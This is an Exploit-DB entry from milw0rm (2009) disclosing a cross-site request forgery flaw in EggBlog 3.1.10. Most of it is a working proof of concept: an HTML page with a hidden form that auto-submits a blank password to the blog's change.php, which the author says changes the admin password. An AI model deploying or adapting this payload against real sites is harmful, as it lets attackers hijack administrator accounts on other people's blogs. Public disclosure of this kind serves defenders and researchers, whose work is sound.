EggBlog 3.1.10 Change Admin Pass CSRF Vulnerability



EDB-ID: 7633 CVE: N/AOSVDB-ID: 51078
Author: x0rPublished: 2009-01-01Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
|                                                                        |
| Project: EggBlog v 3.1.10                                              |
| Author: x0r                                                            |
| Email: andry2000[at]hotmail[dot]it                                     |
|________________________________________________________________________|
Code:
        <html>
        <title>x0r :P </title>
                        <form id="forum-form" name="forumform"
method="post" action="http://[site]/[path]/change.php">
                                                <input type="hidden"
size="30" id="forumpassword" name="password" />
                                                <input type="hidden"
name="submit" value="Submit" />
<script>document.forumform.submit()</script>
                        </form>
        </HTML>
 With this csrf you can change the admin pass ^ ^
# milw0rm.com [2009-01-01]






Comments

No comments so far